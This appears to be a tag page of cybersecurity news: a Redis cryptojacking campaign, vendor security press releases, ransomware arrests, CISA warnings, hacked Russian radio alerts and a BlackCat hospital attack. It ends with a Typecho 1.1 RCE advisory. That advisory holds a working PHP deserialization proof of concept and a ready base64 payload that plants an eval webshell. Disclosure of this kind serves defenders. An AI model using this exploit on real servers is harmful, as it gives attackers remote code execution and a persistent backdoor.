Misconfigured Redis database servers are the target of a novel cryptojacking campaign that leverages a legitimate and open source command-line file transfer service to implement its attack.
"Underpinning this campaign was the use of transfer[.]sh," Cado Security said in a report shared with The Hacker News. "It's possible that it's an attempt at evading detections based on other common code

Data Security / Cryptojacking

Misconfigured Redis database servers are the target of a novel cryptojacking campaign that leverages a legitimate and open source command-line file transfer service to implement its attack.

"Underpinning this campaign was the use of transfer\[.\]sh," Cado Security said in a report shared with The Hacker News. "It's possible that it's an attempt at evading detections based on other common code hosting domains (such as pastebin\[.\]com)."

The cloud cybersecurity firm said the command line interactivity associated with transfer\[.\]sh has made it an ideal tool for hosting and delivering malicious payloads.

The attack chain commences with targeting insecure Redis deployments, followed by registering a cron job that leads to arbitrary code execution when parsed by the scheduler. The job is designed to retrieve a payload hosted at transfer\[.\]sh.

It's worth noting that similar attack mechanisms have been employed by other threat actors like TeamTNT and WatchDog in their cryptojacking operations.

The payload is a script that paves the way for an XMRig cryptocurrency miner, but not before taking preparatory steps to free up memory, terminate competing miners, and install a network scanner utility called pnscan to find vulnerable Redis servers and propagate the infection.

"Although it is clear that the objective of this campaign is to hijack system resources for mining cryptocurrency, infection by this malware could have unintended effects," the company said. "Reckless configuration of Linux memory management systems could quite easily result in corruption of data or the loss of system availability."

The development makes it the latest threat to strike Redis servers after Redigo and HeadCrab in recent months.

The findings also come as Avertium disclosed a new set of attacks in which SSH servers are brute-forced to deploy the XorDdos botnet malware on compromised servers with the goal of launching distributed denial-of-service (DDoS) attacks against targets located in China and the U.S.

The cybersecurity company said it observed 1.2 million unauthorized SSH connection attempts across 18 honeypots between October 6, 2022, and December 7, 2022. It attributed the activity to a threat actor based in China.

42% of those attempts originated from 49 IP addresses assigned to ChinaNet Jiangsu Province Network, with the rest emanating from 8,000 IP addresses scattered all over the world.

"It was found that once the scanning identified an open port, it would be subject to a brute-force attack against the 'root' account using a list of approximately 17,000 passwords," Avertium said. "Once the brute-force attack was successful, a XorDDoS bot was installed."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Cryptojacking Campaign Leverages Misconfigured Redis Database Servers

**SAN FRANCISCO – March 1, 2023 –** Fastly, Inc. (NYSE: FSLY), the world’s fastest global edge cloud platform, today launched Fastly Managed Security Service, a premier 24/7 threat detection and response service dedicated to helping organizations significantly reduce the risk  of web application attacks and associated business costs due to lost transactions. Available to Fastly’s global Next-Gen WAF customers, Fastly Managed Security Service further demonstrates the company’s commitment to helping global marquee customers deliver innovative, secure digital experiences to their users.

Web applications continue to be popular targets for today’s attackers. In fact, according to the Verizon 2022 DBIR, web applications are the number one vector, and not surprisingly, they are also connected to the high number of Denial of Service attacks. This pairing, along with the growing use of stolen credentials (commonly targeting some form of web application) is consistent with what we’ve seen for the past few years. Existing security teams are spread thin and don’t always have the expertise or time to continuously monitor and detect these types of threats. Organizations can deploy Fastly Next-Gen WAF for accurate protection, and now they can further enhance this protection with Fastly’s Managed Security Service.

“Today’s defenders face an uphill battle against cyber adversaries due to an exploding attack surface and increasing volumetric attacks, particularly DDoS attacks. At the same time, security teams want to reduce complexity and prioritize their resources,”said Gino Lang, Vice President of Customer Security, Fastly. “By providing global 24/7 proactive protection, Fastly Managed Security Service delivers comprehensive visibility and the expert staff needed to quickly identify and mitigate potential threats. This frees up organizations to focus their security staff on other business priorities.” 

This latest announcement builds on the success of Fastly’s Response Security Service and other security offerings. “Fastly’s decision to extend its next-generation security capabilities to offer a managed security service is a natural evolution and reconfirms the company’s commitment to protecting organizations from today’s agile and persistent adversaries,” said Christopher Rodriguez, IDC Research Director, Security & Trust.

IDC recently recognized Fastly as a leader in the "IDC MarketScape: Worldwide Commercial CDN Services 2022 Vendor assessment", highlighting the company's ability to create fast, dynamic, and secure digital experiences.   

**About Fastly Managed Security Service**

Fastly Managed Security Service is a premium offering that provides Fastly Next-Gen WAF customers with continuous monitoring and proactive mitigation of web-application attacks, all backed by a 15-minute response time SLA for critical security incidents. We combine this with robust post-event reporting and regular, strategic security consultation in order to ensure the highest level of application protection to strengthen an organization’s overall security posture. 

Staffed 24/7 by Fastly’s global Customer Security Operations Center (CSOC), this service enables in-house teams to improve their overall security posture and focus on their core competencies, strategic initiatives, and high-impact projects.

Fastly’s Managed Security Service is now available to Fastly Next-Gen WAF customers. To learn more about how your organization can add this white glove experience to your security program, please contact \[email protected\]. For additional information about the new service, please visit here. 

**About Fastly**

Fastly’s powerful and programmable edge cloud platform helps the world’s top brands deliver the fastest online experiences possible, while improving site performance, enhancing security, and empowering innovation at global scale. With world-class support that achieves 95%+ average annual customer satisfaction ratings, Fastly’s beloved suite of edge compute, delivery, security and observability offerings has been recognized as a leader by industry analysts such as IDC, Forrester and Gartner. Compared to legacy providers, Fastly’s powerful and modern network architecture is the fastest on the planet, empowering developers to deliver secure websites and apps at global scale with rapid time-to-market and industry-leading cost savings. Thousands of the world’s most prominent organizations trust Fastly to help them upgrade the internet experience, including Reddit, Pinterest, Stripe, Neiman Marcus, The New York Times, Epic Games, and GitHub. Learn more about Fastly at https://www.fastly.com, and follow us @fastly.

Source: Fastly, Inc.

Fastly Launches Managed Security Service to Protect Enterprises From Rising Web Application Attacks

Upgrades boost Edgio's ability to mitigate sophisticated threats and safeguard applications and data.

**Singapore, 24 February 2023 –** Edgio, Inc. (Nasdaq: EGIO), the platform of choice for speed, security and simplicity at the edge, today announced significant enhancements to its Security platform, including a new DDoS scrubbing solution and improved Web Application and API Protection (WAAP) capabilities.

The new DDoS scrubbing solution provides dedicated DDoS mitigation capacity that protects all protocols and direct-to-origin attacks. It complements Edgio’s 250+ Tbps edge network to provide full spectrum DDoS protection. WAAP enhancements include advanced rule customizer, outbound data leak prevention, proxy detection, region code support and enhanced configurability. These new features provide customers with enhanced ability to detect and respond to emerging threats, ensuring confidentiality, integrity and availability of their data and applications.

"New security vulnerabilities are growing at an accelerated rate, and with this growth, it’s imperative that technology also evolve at a similarly exponential rate to stay ahead of the threats," said Ajay Kapur, Edgio’s Chief Technology Officer. "Edgio is doing just that with these product enhancements. Our security platform continues to provide a holistic solution for our customers that can not only mitigate the largest DDoS attacks, but also ensures the protection of critical web applications and APIs."

**Key Highlights/Facts**

*   DDoS attacks are on the rise.  In fact, according to **the 2022 Verizon DBIR (Data Breach Investigations Report)**, the number one security threat is a DDoS attack (46% of attacks) — and it’s growing every year. Therefore, it’s critical to have holistic protection from the full spectrum of DDoS attacks. With the addition of DDoS scrubbing solution, Edgio is able to protect all networks and applications, including direct-to-origin network attack against non-web applications via its dedicated scrubbing capacity utilizing standard protocol such as BGP and GRE tunnel. The combination of Edgio’s Layer 3-7 DDoS protection via its 250+ Tbps with the dedicated DDoS scrubbing provides businesses with a full spectrum protection to ensure maximum resiliency and uptime of their network and applications.

*   Outbound security rules make it easier for companies to prevent attackers from causing a data breach via exploiting known vulnerabilities. Traditionally, security rules only inspect inbound requests to mitigate application attacks from the outside in. Edgio is now adding the ability for security rules to scan outbound traffic as well, which prevents sensitive data and code leakage, providing an added layer of protection for confidential customer data and preventing the client from executing malicious code. Edgio is also adding the ability to detect and block requests originating from anonymous proxies, providing additional control on the access to customers’ applications.  The advanced rules customizer allows customers to control the sensitivity of individual security rules maximizing its accuracy while minimizing false positives. Enhanced configuration management enables developers to directly import and export configuration json via both API and UI to rapidly deploy protection for new applications.

*   Whether for compliance reasons or to prevent commerce to certain countries, Edgio enables clients to control access to their applications via advance access control rules. In the latest enhancements, Edgio is adding support for more granular regional control, down to the region or province level in its WAAP’s access rules and custom security rules, supporting ongoing compliance requirements in today’s changing geopolitical environment.

Edgio's mission is to help businesses protect their web applications and data through a holistic approach to security that also improves speed and reliability. Its advanced security solutions offer full-spectrum network and application DDoS protection, advanced web application and API protection (WAAP) with Dual WAAP Mode, and enterprise-grade bot management. For more information on Edgio's security offerings, click here.

**About Edgio**

Edgio (NASDAQ: EGIO)helps companies deliver online experiences and content faster, safer, and with more control. Our developer-friendly, globally scaled edge network, combined with our fully integrated application and media solutions, provide a single platform for the delivery of high-performing, secure web properties and streaming content. Through this fully integrated platform and end-to-end edge services, companies can deliver content quicker and more securely, thus boosting overall revenue and business value.To learn more, visit edg.io and follow us on Twitter, LinkedIn and Facebook.

Edgio Strengthens Security Offering With WAAP Enhancements and DDoS Scrubbing Solution

By Waqas
The suspects are allegedly involved in hacking, issuing threats, stealing data, laundering money, and extorting
This is a post from HackRead.com Read the original post: Ethical hacker among 3 arrested for blackmail and ransomware attacks

The ethical hacker reportedly works for the Dutch security organization, the Dutch Institute for Vulnerability Disclosure (DIVD).

Amsterdam’s cybercrime police arrested three individuals suspected of **launching ransomware attacks** against businesses in the Netherlands and worldwide. The suspects are allegedly involved in hacking, issuing threats, stealing data, laundering money, and extorting. These criminals extorted small and large businesses worldwide after hacking into their networks, generating €2.5 million.

**Suspects Details**

The detainees are all young males aged between 18 and 21. They were arrested on January 23rd, 2023 and are accused of stealing the private information of tens of millions of users from their targeted networks and blackmailing the victims for ransom.

The 21-year-old hailed from Zandvoort and was in contact with an 18-year-old suspect from Rotterdam; the third, also 18, was arrested in Naaldwijk. One of the suspects is an **ethical hacker** who works for the Dutch security organization, the Dutch Institute for Vulnerability Disclosure (**DIVD**).

The accused are detained in restrictive custody and can only contact their lawyer. The accused arrested in Zandvoort had 45,000 euros in cash and 550,000 euros worth of Bitcoin. Reportedly, the accused used Bitcoin to launder €2.5 million.

**Stolen Data**

**According to** Dutch media, thousands of businesses were targeted, including online stores, social media networks, training and educational institutions, software firms, hotels, and critical infrastructure and services-related entities.

Moreover, the accused damaged property worth millions of euros. The stolen data includes names, addresses, dates of birth, phone numbers, credit card numbers, passwords, bank account details, license plate numbers, passport data, and citizen identification numbers. The victims paid large sums to the hackers, sometimes as much as €700,000. 

**Investigations**

The investigation was launched in March 2021 by the Amsterdam Police Cybercrime Division after receiving a report from a prominent Dutch firm. The firm reported that its computer systems had been hacked and a trove of data had been stolen.

Dutch police **noted** that private and sensitive data had been stolen, and national and international businesses had become victims of hacking and data theft.

One of the victim organizations is Ticketcounter, which sells amusement park and zoo tickets online. Troy Hunt of **HaveIbeenPwned** also tweeted about the Ticketcounter data breach on March 1st, 2021.

> I've spent a bunch of time talking to Ticketcounter over the last week, and this is a really tough situation for them. The exposed database was human error; one bad mistake made in August last year that's now come back to bite them nearly 7 months on. https://t.co/u4xrMZDpGZ
> 
> — Troy Hunt (@troyhunt) March 1, 2021

Other victims include a reputed educational institution and a meal-delivery service. Further probing revealed that the hackers had invaded the computer systems of their targets and sent a threatening email, asking the victims to pay a **ransom in Bitcoin**; otherwise, they would destroy the company’s digital infrastructure or leak the data online. Many victims paid the ransom.

“According to what we know so far, the demand ranges from more than €100,000 to €700,000 and, in addition, the stolen information has often already been sold online,” investigators revealed.

**Dutch Police Tackle Cybercrime**

Although cybercrime in the Netherlands, like any other country, has increased in recent years, Dutch authorities are known for playing a major role in tackling it locally and globally. In fact, Dutch police were behind the shutdown and seizure of the infamous and one of the **largest dark web marketplaces Hansa**.

**Back in April 2020**, Dutch authorities took down 15 DDoS-for-hire services. It took them merely one week to complete the operation. Most recently, **in October 2022**, Dutch police were even able to successfully trick the Deadbolt ransomware gang into sharing decryption keys.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Ethical hacker among 3 arrested for blackmail and ransomware attacks

The Cybersecurity and Infrastructure Security Agency advises US and European nations to prepare for possible website attacks marking the Feb. 24 invasion of Ukraine by Russia.

The one-year anniversary of the start of the war in Ukraine could spur "disruptive and defacement attacks" on US and European websites, the US Cybersecurity and Infrastructure Security Agency (CISA) warned this week.

CISA said cyberattackers could use Feb. 24, which marks one year since the Russian invasion began, as an opportunity to wreak havoc and upheaval amid geopolitical tensions. The agency advised organizations to prepare accordingly and double down on their cybersecurity posture, referring to CISA's Shields Up cyber-defense recommendations, and its DDoS attack guidance.

"CISA urges organizations and individuals to increase their cyber vigilance in response to this potential threat," the agency said in its advisory this week.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

CISA: Beware of DDoS, Web Defacements on Anniversary of Russian Invasion of Ukraine

Preparation and cooperation helped to mitigate the worst of the digital damage, amid cyber sorties from all sides.

When Russia invaded Ukraine on Feb. 24, 2022, much discussion ensued about how the war would be both cyber and kinetic. A year later, the consensus seems to be that while there was a lot of cyberattack activity, it wasn't as destructive as many had feared. That was partly due to various governments and security companies helping to identify and block attacks.

Between February 2022 and February 2023, an average of 10% of all online traffic to Ukraine was mitigations of potential attacks, Cloudflare said in its analysis of the Russian invasion's impact on theUkrainian Internet. Cloudflare protected Ukrainian Web applications by filtering and monitoring HTTP traffic to block malicious attacks, including distributed denial-of-service (DDoS) attacks.

On Oct. 29, DDoS attack traffic constituted 39% of total traffic to Cloudflare's Ukrainian customers.

The company shared a graph showing the daily percentage of application layer traffic to Ukraine that Cloudflare mitigated as potential attacks using its Web application firewall (WAF). In early March, 30% of all traffic was mitigated. After a fairly quiet summer, attack activity ticked back up in early September, during the Ukrainian counteroffensive in east and south Ukraine.

More specifically, 14% of total traffic from Ukraine was mitigated as potential attacks, while 10% of total traffic to Ukraine was mitigated as potential attacks in the past 12 months.

Mitigated application-layer threats blocked by Cloudflare's WAF were 105% higher on Monday, Feb. 28, 2022 — four days after the invasion — compared with the Monday before, Feb. 21, 2022. By March 8, that figure was 1,300%.

**What Came Out of 'Shields Up'**

In anticipation of Russian cyberattacks against Ukrainian targets and against organizations in countries allied with Ukraine, the US Cybersecurity and Infrastructure Security Agency (CISA) urged organizations to share information that could help mitigate threats. "Every organization — large and small — must be prepared to respond to disruptive cyber incidents," CISA said.

While sharing threat intelligence indubitably helped, the nature of the attacks were also less sophisticated or destructive than feared.

Cisco Talos researchers have been monitoring critical infrastructure customers to identify threats and remediate attacks. While there were a lot of concerns about destructive malware, what Talos is seeing — and blocking — a lot of is credentials harvesting, says Nick Biasini, Cisco Talos' head of outreach. Attackers are not resorting to highly sophisticated tactics but rather are employing mundane and recognizable methods to try to gain access to networks and accounts, he says.

**Impact on Critical Infrastructure**

Cloudflare's analysis of Ukraine's Internet traffic shows peaks and drops in usage corresponding with military activity. For example, the city of Chernihiv had a significant drop in traffic the first week of the war and residual traffic by mid-March, with traffic picking up after the Russian retreat in early April, Cloudflare noted. In the fall, Russian military units started targeting Ukrainian critical infrastructure, causing widespread power outages and Internet blackouts. Some of these strikes caused as much as a 50% decrease in Internet traffic, according to Cloudflare's analysis. The disruptions often lasted only a day or two, "further emphasizing the ongoing impact of the conflict on Ukraine's infrastructure," Cloudflare noted.

"Throughout the rest of the year and into 2023, Ukraine has continued to face intermittent Internet disruptions," Cloudflare also wrote.

**Ripple Effects Around the World**

Security leaders in East Asia are carefully watching how the war between Russia and Ukraine unfolds, as a lot of the geopolitical tensions and rhetoric are similar to the long-simmering situation between China and Taiwan. Organizations are "wondering what kind of disruptive attacks to expect" and how the war in Ukraine could affect the Taiwan situation, says Mihoko Matsubara, chief cybersecurity strategist at NTT. There has already been some activity, although it has been of the "cyber nuisance" variety, rather than destruction, Matsubara says. East Asian companies are already seeing DDoS attacks, defacements, and disinformation campaigns, she says.

Matsubara was careful not to downplay the seriousness of the attacks, as they are still disruptive to organizations. NTT has also seen some wiper attacks used to disrupt humanitarian aid efforts, which may be a harbinger of activities to come.

**Bad Actors Get Political**

Cybercriminals have been expressing their own opinions — and political allegiances — about the war. For example, Coalition's latest "Cyber Threat Index" report dug into attacks against databases exposed to the Internet. Coalition observed a total 264,408 IP addresses running MongoDB instances in 2022, and 68,423 of them — or 26% — were compromised. Coalition found a handful of compromised MongoDB servers where the attackers renamed the databases to SLAVA\_UKRAINI, or "Glory to Ukraine!"

"Threat actor activity is often shaped by fluctuations in economic conditions," noted the team from Kroll's Cyber Risk practice in the latest "Threat Landscape" report. "Due to the continued market volatility across the globe and the ongoing war on Ukraine, it is likely that the unstable circumstances in which attackers thrive will persist in 2023."

Evaluating the Cyberwar Set Off by Russian Invasion of Ukraine

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging organizations and individuals to increase their cyber vigilance, as Russia's military invasion of Ukraine officially enters one year.
"CISA assesses that the United States and European nations may experience disruptive and defacement attacks against websites in an attempt to sow chaos and societal discord on February 24,

Cyber War / Cybersecurity

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging organizations and individuals to increase their cyber vigilance, as Russia's military invasion of Ukraine officially enters one year.

"CISA assesses that the United States and European nations may experience disruptive and defacement attacks against websites in an attempt to sow chaos and societal discord on February 24, 2023, the anniversary of Russia's 2022 invasion of Ukraine," the agency said.

To that end, CISA is recommending that organizations implement cybersecurity best practices, increase preparedness, and take proactive steps to reduce the likelihood and impact of distributed denial-of-service (DDoS) attacks.

The advisory comes as the Computer Emergency Response Team of Ukraine (CERT-UA) revealed that Russian nation-state hackers breached government websites and planted backdoors as far back as December 2021.

CERT-UA attributed the activity to a threat actor it tracks as UAC-0056, which is also known under the monikers DEV-0586, Ember Bear, Nodaria, TA471, and UNC2589.

The attacks entail the use of web shells as well as a number of custom backdoors like CredPump, HoaxApe, and HoaxPen, adding to the group's arsenal of tools like WhisperGate, SaintBot, OutSteel, GraphSteel, GrimPlant, and more recently, Graphiron.

The agency, in a related advisory, also disclosed a phishing campaign bearing RAR archives that lead to the deployment of the Remos remote control and surveillance software. It's been linked to a threat actor known as UAC-0050 (and UAC-0096).

The findings come as Fortinet reported a 53% increase in destructive wiper attacks from Q3 to Q4 2022, primarily fueled by Russia's state-sponsored hackers striking an unprecedented variety of data-destroying malware at Ukraine.

"These new strains are increasingly being picked up by cybercriminal groups and used throughout the growing cybercrime-as-a-service (CaaS) network," the security vendor said.

"Cybercriminals are also now developing their own wiper malware which is being used readily across CaaS organizations, meaning that the threat of wiper malware is more widespread than ever and all organizations are a potential target, not just those based in Ukraine or surrounding countries."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Sounds Alarm on Cybersecurity Threats Amid Russia's Invasion Anniversary

By Deeba Ahmed
Several radio stations in Russia were reportedly hacked to send fake missile alerts across the country, the government has claimed.
This is a post from HackRead.com Read the original post: Russian Radio Stations Hacked with Fake Missile Alerts

According to local media, a female voice rendered the fake alerts from several radio stations, including Yumor FM, Relax FM, Comedy Radio, Humor FM, and Avatoradio. The false warning announced an air raid and requested the listeners to seek shelter quickly.

Millions of Russian citizens in over a dozen cities were baffled to hear unusual radio alerts, sirens, and text messages this Wednesday morning. These warnings were about missile strikes and air raids on Russia.

However, the Russian government’s Ministry of Emergency Situations later announced that these were fake warnings and blamed hackers for airing false alerts on commercial radio stations.

According to local media, a female voice rendered the fake alerts from several radio stations, including Yumor FM, Relax FM, Comedy Radio, Humor FM, and Avatoradio. The false warning announced an air raid and requested the listeners to seek shelter quickly.

“Attention, an air raid warning is being announced. Go to the shelter immediately. Attention, Attention, the threat of a missile strike.”

> Today, radio stations across Russia including in Volgograd, Stavropol, Moscow region broadcasted air raid warnings (the video is reportedly from Belgorod)
> 
> Acc to the Ministry of Emergency Situations this messages is fake and was caused by a hacker attack https://t.co/Cd7bGeVVAx pic.twitter.com/wfuIjGQkyZ
> 
> — Oleg Shakirov (@shakirov2036) February 22, 2023

These bogus warnings were broadcast in ten cities, including Kazan, Tyumen, Pyatigorsk, Nizhny Novgorod, Voronezh, Magnitogorsk, Novouralsk, Ufa, and Stary Oskol. Loud sirens followed these warnings, and civilians were urged to seek out air raid shelters. Some people recorded these false warnings on camera.

Locals in the cities where the warnings were broadcast, such as the Kurgan and Belgorod regions, promptly informed citizens that these were false warnings. The ministry noted that the warnings were caused by an attack on a satellite operator’s infrastructure.

Moreover, government officials stated that an unauthorized “tie-in is going in the air,” clarifying that the alarm signals were fake. Authorities claim that the perpetrators could be linked to the Kyiv regime.

*   Anonymous sent 7m texts to Russians; hacked security cams
*   Anonymous hacked 90% of Russian misconfigured databases
*   Anonymous hacked Russian TV, streaming services for Ukraine
*   Anonymous hacks Russian printers to send anti-war messages
*   Anonymous hacked Russian Yandex taxi app causing traffic jam

Earlier, a Denial of Service attack (DDoS attack) disrupted Russian President Vladimir Putin’s address to the nation on state media sites. Ukrainian hackers claimed responsibility for the attack.

“As a result of a hacker attack on the servers of some commercial radio stations in some regions of the country, information was broadcast about an alleged announcement of an air raid warning and a threat of a missile strike,” the ministry’s statement read.

It is worth noting that most stations airing these alerts are owned by Russia’s leading media company, Gazprom-Media. Furthermore, the alerts were aired just two days before the first anniversary of the Russian invasion of Ukraine.

Russian Radio Stations Hacked with Fake Missile Alerts

Categories: News
Categories: Ransomware
Tags: Lehigh Valley Health Network

Tags:  LVHN

Tags:  BlackCat

Tags:  ALPHV

Tags:  Noberus

Tags:  ransomware

Tags:  leak site

Tags:  DDoS

The Lehigh Valley Health Network stated it was the target of a cybersecurity attack by a ransomware gang known as BlackCat



(Read more...)




The post BlackCat ransomware targets another healthcare facility appeared first on Malwarebytes Labs.

Posted: February 23, 2023 by

In a statement issued Monday morning, Lehigh Valley Health Network said it had been the target of a cyberattack attributed to a ransomware gang known as BlackCat. The Network is made up of 13 hospital campuses, as well as other health facilities, and is based in Pennsylvania.

**BlackCat**

The ransomware-as-a-service (RaaS) group BlackCat, also known as ALPHV and Noberus, is currently one of the most active groups, and has been associated with Russia. In our recent February ransomware review it came in second after Lockbit, based on the number of known attacks.

In December, 2022, the Office of Information Security and Health Sector Cybersecurity Coordination Center issued an extensive Analyst Note which identified BlackCat as a "relatively new but highly-capable" ransomware threat to health care providers.

BlackCat uses double extortion and sometimes triple extortion to make victims pay the ransom. That means that besides encrypting files, the gang also threaten to publish the stolen data on a so-called “leak site”, and at times, threaten their victims with DDoS attacks.

**The attack**

According to the health network, the attack targeted the network supporting Delta Medix, a physician practice in Lackawanna County. The unauthorized activity was detected on February 6, 2023 and involved a computer system used for patient images for radiation oncology treatment and other sensitive information.

The health network is investigating the full scope of the attack, but says services have not been disrupted, although its websites seem to be offline for the moment. It was unable to say yet whether any specific patient's personal or sensitive information was compromised, but promised to inform any affected individuals if it discovers that was the case.

**No ransom**

The Lehigh Valley Health Network said it has refused to pay a ransom, but did not disclose the demanded amount. According to the US Department of Health and Human Services (HHS) The BlackCat group has demanded ransoms as high as $1.5 million in previous cybersecurity attacks against the healthcare sector.

Dr. Brian Nester, the health network's president and CEO said:

> "BlackCat demanded a ransom payment, but LVHN refused to pay this criminal enterprise. We understand that BlackCat has targeted other organizations in the academic and health care sectors. We are continuing to work closely with our cybersecurity experts to evaluate the information involved and will provide notices to individuals as required as soon as possible. Attacks like this are reprehensible and we are dedicating appropriate resources to respond to this incident."

Recent reports indicated that ransomware revenue went significantly down over 2022, likely due to companies’ increasing unwillingness to meet the ransom demands.

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Write an incident response plan**. The period after a ransomware attack can be chaotic. Make a plan that outlines how you'll isolate an outbreak, communicate with stakeholders, and restore your systems.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

BlackCat ransomware targets another healthcare facility

typecho 1.1/17.10.30 was discovered to contain a remote code execution (RCE) vulnerability via install.php.

**List of Vulnerable path**

Vulnerable path /install.php  
Lines 60-69 of the "install.php" catch the error but do nothing,so bypass the line 65's "exit".  
  
It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.  
We can simulate this situation by breakpoint debugging.Set the breakpoint on the line 60,then cut off the connection with the database.(such as phpstorm + phpstudy and so on)  
  
  
Lines 74-87 of the "install.php",we can fake the reffer bypass the second "exit".we can set the reffer "http://localhost/".  
  
Line 291 of the "install.php" has a function "unserialize",it can be exploited maliciously.  
The parameters come from line 83 of the "/var/Typecho/Cookie.php".  
  
Line 420 of the "install.php" triggeres function "\_\_toString".  
Line 223 of the "/var/Typecho/Feed.php" has function "\_\_toString"  
  
  
  
Line 290 of the "/var/Typecho/Feed.php" triggeres function "\_\_get".  
Line 270 of the "/var/Typecho/Request.php" has function "\_\_get"  
  
  
  
We can exploit function "call\_user\_func" to Remote Code Execute.

**Vulnerability exploitation process:**

It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.Of course,we can send network packets repeatedly to wait for it.  
  
The "ok" will be sent if it is success because of the POC.Then test the webshell.  

**POC code:**

<?php
class Typecho\_Request{
    private $\_params\= array('screenName'\=> 'php -r "echo \\'ok\\';file\_put\_contents(\\'cmd.php\\', \\'<?php eval($\_POST\[\\"youyou\\"\]); ?>\\');"');
    private $\_filter\= array('system');
}
class Typecho\_Feed{
    private $\_items\=array();
    private $\_type\='ATOM 1.0';
    public function \_\_construct()
    {
        $items\['author'\]=new Typecho\_Request();
        $this\->\_items\[0\]=$items;
    }
}
$config\['prefix'\] = new Typecho\_Feed();;
$payload = base64\_encode(serialize($config));
echo $payload;

URL: http://localhost/install.php?start=1
POST Data: delete=true&\_\_typecho\_config=YToxOntzOjY6InByZWZpeCI7TzoxMjoiVHlwZWNob19GZWVkIjoyOntzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo4NjoicGhwIC1yICJlY2hvICdvayc7ZmlsZV9wdXRfY29udGVudHMoJ2NtZC5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbXCJ5b3V5b3VcIl0pOyA/PicpOyIiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7fX0\=
Reffer: http://localhost/

Tag

#ddos